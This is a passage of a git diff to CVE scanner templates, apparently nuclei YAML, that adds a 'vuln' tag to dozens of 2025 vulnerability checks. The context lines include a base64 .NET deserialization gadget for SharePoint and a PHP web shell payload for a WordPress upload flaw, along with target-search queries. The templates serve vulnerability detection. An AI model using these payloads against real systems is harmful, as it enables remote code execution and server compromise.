b/http/cves/2025/CVE-2025-53118.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 3 fofa-query: (icon_hash="1798893256" || icon_hash="-766529773") - tags: cve,cve2025,securden,pam,auth-bypass + tags: cve,cve2025,securden,pam,auth-bypass,vuln flow: http(1) & http(2) & http(3) diff --git a/http/cves/2025/CVE-2025-53364.yaml b/http/cves/2025/CVE-2025-53364.yaml index 7b1ec20794c..85144ae5b94 100644 --- a/http/cves/2025/CVE-2025-53364.yaml +++ b/http/cves/2025/CVE-2025-53364.yaml @@ -19,7 +19,7 @@ info: - http.title:"parse server" || "parse-server" - http.title:"parse dashboard" fofa-query: title="parse dashboard" - tags: cve,cve2025,parse,graphql,exposure + tags: cve,cve2025,parse,graphql,exposure,vuln variables: appid: "{{appid}}" diff --git a/http/cves/2025/CVE-2025-53558.yaml b/http/cves/2025/CVE-2025-53558.yaml index 05f17146017..c5f0d18ae2b 100644 --- a/http/cves/2025/CVE-2025-53558.yaml +++ b/http/cves/2025/CVE-2025-53558.yaml @@ -13,7 +13,7 @@ info: shodan-query: title:"F660" verified: true max-request: 1 - tags: cve,cve2025,default-login,zte + tags: cve,cve2025,default-login,zte,vuln variables: username: "admin" diff --git a/http/cves/2025/CVE-2025-53624.yaml b/http/cves/2025/CVE-2025-53624.yaml index 578c2dbc58a..c9625de6b67 100644 --- a/http/cves/2025/CVE-2025-53624.yaml +++ b/http/cves/2025/CVE-2025-53624.yaml @@ -28,7 +28,7 @@ info: product: docusaurus_plugin_content_gists shodan-query: http.html:"Docusaurus" fofa-query: body="Docusaurus" - tags: cve,cve2025,docusaurus,exposure + tags: cve,cve2025,docusaurus,exposure,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-53770.yaml b/http/cves/2025/CVE-2025-53770.yaml index 0f510061088..264ad5293cf 100644 --- a/http/cves/2025/CVE-2025-53770.yaml +++ b/http/cves/2025/CVE-2025-53770.yaml @@ -26,7 +26,7 @@ info: verified: true max-request: 1 shodan-query: http.component:"sharepoint" - tags: cve,cve2025,kev,sharepoint,rce,microsoft,toolshell,vkev + tags: cve,cve2025,kev,sharepoint,rce,microsoft,toolshell,vkev,vuln variables: dataset_gadget_b64: 'AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAABNTeXN0ZW0uRGF0YS5EYXRhU2V0AgAAAAlYbWxTY2hlbWELWG1sRGlmZkdyYW0BAQIAAAAGAwAAAKEKPHhzOnNjaGVtYSB4bWxucz0iIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zOm1zZGF0YT0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtbXNkYXRhIiBpZD0ic29tZWRhdGFzZXQiPg0KICAgICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9InNvbWVkYXRhc2V0IiBtc2RhdGE6SXNEYXRhU2V0PSJ0cnVlIiBtc2RhdGE6VXNlQ3VycmVudExvY2FsZT0idHJ1ZSI+DQogICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjaG9pY2UgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9InVuYm91bmRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0iaGVoZSI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJwd24iIG1zZGF0YTpEYXRhVHlwZT0iU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuTGlzdGAxW1tTeXN0ZW0uRGF0YS5TZXJ2aWNlcy5JbnRlcm5hbC5FeHBhbmRlZFdyYXBwZXJgMltbU3lzdGVtLldlYi5VSS5Mb3NGb3JtYXR0ZXIsIFN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhXSxbU3lzdGVtLldpbmRvd3MuRGF0YS5PYmplY3REYXRhUHJvdmlkZXIsIFByZXNlbnRhdGlvbkZyYW1ld29yaywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzVdXSwgU3lzdGVtLkRhdGEuU2VydmljZXMsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0iIHR5cGU9InhzOmFueVR5cGUiIG1pbk9jY3Vycz0iMCIvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmNob2ljZT4NCiAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICA8L3hzOnNjaGVtYT4GBAAAAMtHPGRpZmZncjpkaWZmZ3JhbSB4bWxuczptc2RhdGE9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eG1sLW1zZGF0YSIgeG1sbnM6ZGlmZmdyPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSI+DQogICAgICAgICAgICAgICAgPHNvbWVkYXRhc2V0Pg0KICAgICAgICAgICAgICAgICAgICA8aGVoZSBkaWZmZ3I6aWQ9IlRhYmxlIiBtc2RhdGE6cm93T3JkZXI9IjAiIGRpZmZncjpoYXNDaGFuZ2VzPSJpbnNlcnRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICA8cHduIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZFdyYXBwZXJPZkxvc0Zvcm1hdHRlck9iamVjdERhdGFQcm92aWRlciB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiA+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZEVsZW1lbnQvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8UHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE1ldGhvZE5hbWU+RGVzZXJpYWxpemU8L01ldGhvZE5hbWU+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8TWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YW55VHlwZSB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4c2k6dHlwZT0ieHNkOnN0cmluZyI+SEFYPC9hbnlUeXBlPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9NZXRob2RQYXJhbWV0ZXJzPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE9iamVjdEluc3RhbmNlIHhzaTp0eXBlPSJMb3NGb3JtYXR0ZXIiPjwvT2JqZWN0SW5zdGFuY2U+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvUHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvRXhwYW5kZWRXcmFwcGVyT2ZMb3NGb3JtYXR0ZXJPYmplY3REYXRhUHJvdmlkZXI+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3B3bj4NCiAgICAgICAgICAgICAgICAgICAgPC9oZWhlPg0KICAgICAgICAgICAgICAgIDwvc29tZWRhdGFzZXQ+DQogICAgICAgICAgICA8L2RpZmZncjpkaWZmZ3JhbT4L' diff --git a/http/cves/2025/CVE-2025-53771.yaml b/http/cves/2025/CVE-2025-53771.yaml index 085f82ab0d6..e8018a465cb 100644 --- a/http/cves/2025/CVE-2025-53771.yaml +++ b/http/cves/2025/CVE-2025-53771.yaml @@ -27,7 +27,7 @@ info: verified: true max-request: 1 shodan-query: http.component:"sharepoint" - tags: cve,cve2025,sharepoint,auth-bypass,microsoft,toolshell,vkev + tags: cve,cve2025,sharepoint,auth-bypass,microsoft,toolshell,vkev,vuln variables: dataset_gadget_b64: 'AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAABNTeXN0ZW0uRGF0YS5EYXRhU2V0AgAAAAlYbWxTY2hlbWELWG1sRGlmZkdyYW0BAQIAAAAGAwAAAKEKPHhzOnNjaGVtYSB4bWxucz0iIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zOm1zZGF0YT0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtbXNkYXRhIiBpZD0ic29tZWRhdGFzZXQiPg0KICAgICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9InNvbWVkYXRhc2V0IiBtc2RhdGE6SXNEYXRhU2V0PSJ0cnVlIiBtc2RhdGE6VXNlQ3VycmVudExvY2FsZT0idHJ1ZSI+DQogICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjaG9pY2UgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9InVuYm91bmRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0iaGVoZSI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJwd24iIG1zZGF0YTpEYXRhVHlwZT0iU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuTGlzdGAxW1tTeXN0ZW0uRGF0YS5TZXJ2aWNlcy5JbnRlcm5hbC5FeHBhbmRlZFdyYXBwZXJgMltbU3lzdGVtLldlYi5VSS5Mb3NGb3JtYXR0ZXIsIFN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhXSxbU3lzdGVtLldpbmRvd3MuRGF0YS5PYmplY3REYXRhUHJvdmlkZXIsIFByZXNlbnRhdGlvbkZyYW1ld29yaywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzVdXSwgU3lzdGVtLkRhdGEuU2VydmljZXMsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0iIHR5cGU9InhzOmFueVR5cGUiIG1pbk9jY3Vycz0iMCIvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmNob2ljZT4NCiAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICA8L3hzOnNjaGVtYT4GBAAAAMtHPGRpZmZncjpkaWZmZ3JhbSB4bWxuczptc2RhdGE9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eG1sLW1zZGF0YSIgeG1sbnM6ZGlmZmdyPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSI+DQogICAgICAgICAgICAgICAgPHNvbWVkYXRhc2V0Pg0KICAgICAgICAgICAgICAgICAgICA8aGVoZSBkaWZmZ3I6aWQ9IlRhYmxlIiBtc2RhdGE6cm93T3JkZXI9IjAiIGRpZmZncjpoYXNDaGFuZ2VzPSJpbnNlcnRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICA8cHduIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZFdyYXBwZXJPZkxvc0Zvcm1hdHRlck9iamVjdERhdGFQcm92aWRlciB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiA+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZEVsZW1lbnQvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8UHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE1ldGhvZE5hbWU+RGVzZXJpYWxpemU8L01ldGhvZE5hbWU+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8TWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YW55VHlwZSB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4c2k6dHlwZT0ieHNkOnN0cmluZyI+SEFYPC9hbnlUeXBlPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9NZXRob2RQYXJhbWV0ZXJzPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE9iamVjdEluc3RhbmNlIHhzaTp0eXBlPSJMb3NGb3JtYXR0ZXIiPjwvT2JqZWN0SW5zdGFuY2U+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvUHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvRXhwYW5kZWRXcmFwcGVyT2ZMb3NGb3JtYXR0ZXJPYmplY3REYXRhUHJvdmlkZXI+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3B3bj4NCiAgICAgICAgICAgICAgICAgICAgPC9oZWhlPg0KICAgICAgICAgICAgICAgIDwvc29tZWRhdGFzZXQ+DQogICAgICAgICAgICA8L2RpZmZncjpkaWZmZ3JhbT4L' diff --git a/http/cves/2025/CVE-2025-53833.yaml b/http/cves/2025/CVE-2025-53833.yaml index 534fc7097bf..1f68714838b 100644 --- a/http/cves/2025/CVE-2025-53833.yaml +++ b/http/cves/2025/CVE-2025-53833.yaml @@ -28,7 +28,7 @@ info: vendor: binarytorch product: larecipe fofa-query: body="/binarytorch/larecipe/" - tags: cve,cve2025,larecipe,rce,ssti,oss,vkev + tags: cve,cve2025,larecipe,rce,ssti,oss,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-5394.yaml b/http/cves/2025/CVE-2025-5394.yaml index ac87e8a6b1e..4df32bdf8e6 100644 --- a/http/cves/2025/CVE-2025-5394.yaml +++ b/http/cves/2025/CVE-2025-5394.yaml @@ -17,7 +17,7 @@ info: max-request: 1 publicwww-query: "/wp-content/themes/alone/" fofa-query: body="/wp-content/themes/alone/" - tags: cve,cve2025,unauth,file-upload,rce,vkev + tags: cve,cve2025,unauth,file-upload,rce,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-54123.yaml b/http/cves/2025/CVE-2025-54123.yaml index fdf4f0bde63..b04c28fba66 100644 --- a/http/cves/2025/CVE-2025-54123.yaml +++ b/http/cves/2025/CVE-2025-54123.yaml @@ -18,7 +18,7 @@ info: fofa-query: - icon_hash="1357234275" - title="Hoverfly Dashboard" - tags: cve,cve2025,hoverfly,rce,intrusive + tags: cve,cve2025,hoverfly,rce,intrusive,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-54125.yaml b/http/cves/2025/CVE-2025-54125.yaml index 9a6b92db201..9a8fd625432 100644 --- a/http/cves/2025/CVE-2025-54125.yaml +++ b/http/cves/2025/CVE-2025-54125.yaml @@ -21,7 +21,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2025,xwiki,exposure,vkev + tags: cve,cve2025,xwiki,exposure,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-54249.yaml b/http/cves/2025/CVE-2025-54249.yaml index d3f5e8f5726..594f9d32dea 100644 --- a/http/cves/2025/CVE-2025-54249.yaml +++ b/http/cves/2025/CVE-2025-54249.yaml @@ -16,7 +16,7 @@ info: vendor: adobe product: experience_manager fofa-query: body="/libs/granite/core/content/login.html" - tags: cve,2025,adobe,aem,ssrf,oast,oob,vkev + tags: cve,2025,adobe,aem,ssrf,oast,oob,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-54251.yaml b/http/cves/2025/CVE-2025-54251.yaml index 165660851d1..95aeb1c2c96 100644 --- a/http/cves/2025/CVE-2025-54251.yaml +++ b/http/cves/2025/CVE-2025-54251.yaml @@ -27,7 +27,7 @@ info: - http.title:"aem sign in" - http.component:"adobe experience manager" - cpe:"cpe:2.3:a:adobe:experience_manager" - tags: cve,2025,adobe,aem,xxe,oast,oob,intrusive + tags: cve,2025,adobe,aem,xxe,oast,oob,intrusive,vuln variables: marker: "{{randstr}}" diff --git a/http/cves/2025/CVE-2025-54589.yaml b/http/cves/2025/CVE-2025-54589.yaml index f7dd96b4087..cb1c6456c22 100644 --- a/http/cves/2025/CVE-2025-54589.yaml +++ b/http/cves/2025/CVE-2025-54589.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.title:"copyparty" fofa-query: title="copyparty" google-query: intitle:"copyparty" - tags: cve,cve2025,xss,copyparty + tags: cve,cve2025,xss,copyparty,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-54782.yaml b/http/cves/2025/CVE-2025-54782.yaml index 70d1ebbef4f..d555e644f40 100644 --- a/http/cves/2025/CVE-2025-54782.yaml +++ b/http/cves/2025/CVE-2025-54782.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 shodan-query: "devtools.nestjs.com" - tags: cve,cve2025,nestjs,rce,sandbox,devtool,unauth,vkev + tags: cve,cve2025,nestjs,rce,sandbox,devtool,unauth,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-55161.yaml b/http/cves/2025/CVE-2025-55161.yaml index 6828d1a9f77..54a144a9d84 100644 --- a/http/cves/2025/CVE-2025-55161.yaml +++ b/http/cves/2025/CVE-2025-55161.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Stirling PDF" - tags: cve,cve2025,ssrf,stirling-pdf,pdf,markdown,oast,oob,vkev + tags: cve,cve2025,ssrf,stirling-pdf,pdf,markdown,oast,oob,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2025/CVE-2025-55169.yaml b/http/cves/2025/CVE-2025-55169.yaml index 9bda64c32f3..989a7c801c3 100644 --- a/http/cves/2025/CVE-2025-55169.yaml +++ b/http/cves/2025/CVE-2025-55169.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 fofa-query: title="WeGIA" - tags: cve,cve2025,wegia,lfi + tags: cve,cve2025,wegia,lfi,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-5569.yaml b/http/cves/2025/CVE-2025-5569.yaml index 704b086e30c..beba67b917f 100644 --- a/http/cves/2025/CVE-2025-5569.yaml +++ b/http/cves/2025/CVE-2025-5569.yaml @@ -22,7 +22,7 @@ info: product: IdeaCMS shodan-query: http.favicon.hash:-1033616879 fofa-query: icon_hash:"-1033616879" - tags: cve,cve2025,ideacms,sqli + tags: cve,cve2025,ideacms,sqli,vuln variables: num: "999999999" diff --git a/http/cves/2025/CVE-2025-55747.yaml b/http/cves/2025/CVE-2025-55747.yaml index a4d4dcda634..0ba0881377a 100644 --- a/http/cves/2025/CVE-2025-55747.yaml +++ b/http/cves/2025/CVE-2025-55747.yaml @@ -23,7 +23,7 @@ info: metadata: verified: true fofa-query: app="XWIKI-Platform" - tags: cve,cve2025,xwiki,lfi + tags: cve,cve2025,xwiki,lfi,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-55748.yaml b/http/cves/2025/CVE-2025-55748.yaml index ca8456d412d..b5b179b8b76 100644 --- a/http/cves/2025/CVE-2025-55748.yaml +++ b/http/cves/2025/CVE-2025-55748.yaml @@ -25,7 +25,7 @@ info: verified: true max-request: 1 fofa-query: app="XWIKI-Platform" - tags: cve,cve2025,xwiki,lfi + tags: cve,cve2025,xwiki,lfi,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-5701.yaml b/http/cves/2025/CVE-2025-5701.yaml index ae7a2fb0f4f..4175e72c36a 100644 --- a/http/cves/2025/CVE-2025-5701.yaml +++ b/http/cves/2025/CVE-2025-5701.yaml @@ -22,7 +22,7 @@ info: vendor: wordpress product: hypercomments fofa-query: body="/wp-content/plugins/hypercomments" - tags: cve,cve2025,wp,wp-plugin,wordpress,hypercomments,priv-esc + tags: cve,cve2025,wp,wp-plugin,wordpress,hypercomments,priv-esc,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-5777.yaml b/http/cves/2025/CVE-2025-5777.yaml index 4eed34d0d83..60159c2f9e7 100644 --- a/http/cves/2025/CVE-2025-5777.yaml +++ b/http/cves/2025/CVE-2025-5777.yaml @@ -26,7 +26,7 @@ info: - title="NetScaler AAA" - icon_hash="-1166125415" - icon_hash="-1292923998" - tags: cve,cve2025,netscaler,citrix,exposure,kev,vkev + tags: cve,cve2025,netscaler,citrix,exposure,kev,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-57788.yaml b/http/cves/2025/CVE-2025-57788.yaml index 31fb6017e16..cca5186c16e 100644 --- a/http/cves/2025/CVE-2025-57788.yaml +++ b/http/cves/2025/CVE-2025-57788.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-542502280 - tags: cve,cve2025,commandcenter,commvault,unauth,vkev + tags: cve,cve2025,commandcenter,commvault,unauth,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2025/CVE-2025-57789.yaml b/http/cves/2025/CVE-2025-57789.yaml index b5314ab4a5b..bb2dff170a5 100644 --- a/http/cves/2025/CVE-2025-57789.yaml +++ b/http/cves/2025/CVE-2025-57789.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:-542502280 - tags: cve,cve2025,commandcenter,commvault,unauth + tags: cve,cve2025,commandcenter,commvault,unauth,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-57808.yaml b/http/cves/2025/CVE-2025-57808.yaml index dece0f9b5ac..f33c496dc33 100644 --- a/http/cves/2025/CVE-2025-57808.yaml +++ b/http/cves/2025/CVE-2025-57808.yaml @@ -18,7 +18,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"ESPHome" - tags: cve,cve2025,auth-bypass,esphome + tags: cve,cve2025,auth-bypass,esphome,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-57819.yaml b/http/cves/2025/CVE-2025-57819.yaml index 0b6654da6b9..19a3862a24f 100644 --- a/http/cves/2025/CVE-2025-57819.yaml +++ b/http/cves/2025/CVE-2025-57819.yaml @@ -34,7 +34,7 @@ info: google-query: - intitle:"freepbx administration" - intitle:"freepbx" - tags: cve,cve2025,freepbx,sqli,rce,kev,intrusive,vkev + tags: cve,cve2025,freepbx,sqli,rce,kev,intrusive,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2025/CVE-2025-57822.yaml b/http/cves/2025/CVE-2025-57822.yaml index b72149e81fb..69493fb3526 100644 --- a/http/cves/2025/CVE-2025-57822.yaml +++ b/http/cves/2025/CVE-2025-57822.yaml @@ -26,7 +26,7 @@ info: - http.html:"/_next/static" fofa-query: - body="/_next/static" - tags: cve,cve2025,ssrf,nextjs,oast,oob + tags: cve,cve2025,ssrf,nextjs,oast,oob,vuln variables: cache-buster: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2025/CVE-2025-58179.yaml b/http/cves/2025/CVE-2025-58179.yaml index 3ecb1eb94e7..0af4c678afb 100755 --- a/http/cves/2025/CVE-2025-58179.yaml +++ b/http/cves/2025/CVE-2025-58179.yaml @@ -22,7 +22,7 @@ info: max-request: 1 vendor: withastro product: astro - tags: cve,cve2025,ssrf,xss,astro,cloudflare + tags: cve,cve2025,ssrf,xss,astro,cloudflare,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-58434.yaml b/http/cves/2025/CVE-2025-58434.yaml index c833c54a305..6f3190cac1e 100644 --- a/http/cves/2025/CVE-2025-58434.yaml +++ b/http/cves/2025/CVE-2025-58434.yaml @@ -19,7 +19,7 @@ info: metadata: verified: true shodan-query: http.title:"Flowise - Build AI Agents, Visually" - tags: cve,cve2025,flowise,ato,rce,unauth + tags: cve,cve2025,flowise,ato,rce,unauth,vuln variables: username: "{{username}}" diff --git a/http/cves/2025/CVE-2025-58751.yaml b/http/cves/2025/CVE-2025-58751.yaml index 7bd9b30a5aa..92da9f8ba21 100644 --- a/http/cves/2025/CVE-2025-58751.yaml +++ b/http/cves/2025/CVE-2025-58751.yaml @@ -24,7 +24,7 @@ info: verified: true max-request: 1 fofa-query: body="/@vite/client" - tags: cve,cve2025,vite,lfi + tags: cve,cve2025,vite,lfi,vuln http: diff --git a/http/cves/2025/CVE-2025-59049.yaml b/http/cves/2025/CVE-2025-59049.yaml index 5312970a700..5f80485cbf3 100644 --- a/http/cves/2025/CVE-2025-59049.yaml +++ b/http/cves/2025/CVE-2025-59049.yaml @@ -22,7 +22,7 @@ info: max-request: 1 vendor: mockoon product: mockoon - tags: cve,cve2025,mockoon,lfi,path-traversal + tags: cve,cve2025,mockoon,lfi,path-traversal,vuln variables: static_dir: "static" diff --git a/http/cves/2025/CVE-2025-59474.yaml b/http/cves/2025/CVE-2025-59474.yaml index d41a65045b8..e77f764f1cc 100644 --- a/http/cves/2025/CVE-2025-59474.yaml +++ b/http/cves/2025/CVE-2025-59474.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 2 shodan-query: product:"jenkins" - tags: cve,cve2025,jenkins,sidepanel,unauth,vkev + tags: cve,cve2025,jenkins,sidepanel,unauth,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-5961.yaml b/http/cves/2025/CVE-2025-5961.yaml index 675c04125a9..04694cf0c5e 100644 --- a/http/cves/2025/CVE-2025-5961.yaml +++ b/http/cves/2025/CVE-2025-5961.yaml @@ -24,7 +24,7 @@ info: verified: true max-request: 4 publicwww--query: "/plugins/wpvivid-backuprestore/" - tags: cve,cve2025,wordpress,,wp-plugin,intrusive,wpvivid-backuprestore,authenticated,file-upload,backup + tags: cve,cve2025,wordpress,,wp-plugin,intrusive,wpvivid-backuprestore,authenticated,file-upload,backup,vuln variables: payload: '<?php echo "<br>"; if(isset($_GET["cmd"])){ echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; } ?>' diff --git a/http/cves/2025/CVE-2025-6058.yaml b/http/cves/2025/CVE-2025-6058.yaml index 3c7e26e1f58..8060cf43fb2 100644 --- a/http/cves/2025/CVE-2025-6058.yaml +++ b/http/cves/2025/CVE-2025-6058.yaml @@ -21,7 +21,7 @@ info: max-request: 1 publicwww-query: "/wp-content/plugins/wpbookit/" fofa-query: body="/wp-content/plugins/wpbookit/" - tags: 